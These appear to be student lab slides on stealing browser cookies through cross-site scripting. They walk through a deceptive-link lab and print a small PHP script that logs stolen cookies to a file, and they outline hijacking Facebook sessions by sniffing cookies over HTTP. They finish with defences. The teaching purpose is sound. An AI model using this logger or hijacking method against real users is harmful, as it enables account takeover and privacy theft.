Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson Lab 3 Goals • Learn what cookies are • Learn about Cross-Site Scripting Attacks • Learn what it means to steal cookie information • Get hands on experience with a web browser vulnerability What are cookies? • Nope, not the kind you eat! ;) • The Kind that track you like a creepy stalker! • Cookies are data stored in a web browser • There many different “types” of cookies: • Session, Persistent/Tracking • Persistent cookies are cookies that will outlast user sessions and are used for a variety of reasons • Zombie Cookies that recreate themselves • Cookies identify who you are to a website • The website stores this information (like your username and password) to help provide you with the pages you view • They can be used to keep track and keep records of users browsing histories and activity …. Are they Good or Bad? • Cookies can be tracked by third-parties and are used by advertising companies to track users across multiple sites and pages. • For example, in 2002 the CIA was leaving persistent cookies on computers who were visiting their sites. • In 2005, The NSA has also left persistent cookies from a software upgrade. • RFC 2965 specifies that browsers should protect user privacy and not allow third-party cookies by DEFAULT. • BUT most browsers ALLOW these third-party cookies by default. It is allowed because browsers and the third-party website has it stated in their Policies and agreements • For instance, Do you think Facebook should have the right to track your Google searches? Or any online activity? Cross-site Scripting Attacks/XSS • These vulnerabilities would occur in the serverside code • They are vulnerabilities in Web Applications • XSS injects client-side script into web pages • There are different kinds of XSS attacks, but Lab 3 deals with cookie stealing through XSS • The injected code Steals a cookie that should be only exchanged between the server/client and is sent to another party We will be using these Webhacking.zip Files • malURL.htm • Redirectpage.htm • Setgetcookie.htm • Stealcookie.php • Log.txt Lab 3 Process 1. User first opens setgetcookie.htm on vulnerable site 2. Sets cookie 3. Attacker sends malURL.htm to user with malicious URLs in it 4. Clicking on them redirects user to redirectpage.htm 5. redirectpage.htm has script embedded in a html tag 6. Script inputs the document’s cookie to stealcookie.php on attacker’s site 7. Stealcookie.php logs the cookie on attacker’s site setgetcookie.htm malURL.htm malURL.htm Hovering over each link with your cursor shows two different destinations. One is more deceiving and more likely to be opened/clicked on Second Link: redirectpage.htm redirects to stealcookie.php <body> <?php $f = fopen("log.txt","a"); $cookie = "\n".$_GET['username']."\n"; fwrite($f, $cookie); fclose($f); ?> </body> Log.txt • Stealcookie.php file stores the cookie into the log.txt file BAM!!! You’re HACKED! Today: Changes and Threats • Lab 3 is only an example of the general process of XSS cookie stealing and would not work in real world because of an increase in the web browsing security. • Modern browsers are more sophisticated now and don’t relocate to new sites without permission and they filter out scripts from links • But hackers come up new ways around these features EVERYDAY • Which is why it is so important to update all of your software regularly. • Examples of cookie stealing: • Malicious links through instant messengers, emails, spam, Facebook, disguised websites, disguised links • Web browsing and clicking on malicious links • Injected sophisticated scripting code to trick users Real World Cookie Stealing Example • Facebook cookie stealing Example: • You can capture packets using a free network packet analyzer • This is where you can Find a “cookie” over an internet connection • You’ll need other applications as well like Firefox, greasemonkey, and cookieinjector script • This example gives you access to their account but doesn’t give you their credentials • Only works if Facebook connection is HTTP • Prevented by using HTTPS which you can enable in your Browser under Account Settings>Security Preventing cookie stealing • Using HTTPS encrypts and protects • Web Vulnerability Scanners Choosing to “Remember Me” uses • Google uses similar cookies for its services • Detecting suspicious activity on server side • Requiring Re-authentication • Cookies are browser specific • Browser Fingerprint • Change Browser Settings to tell websites not to track you Any Questions?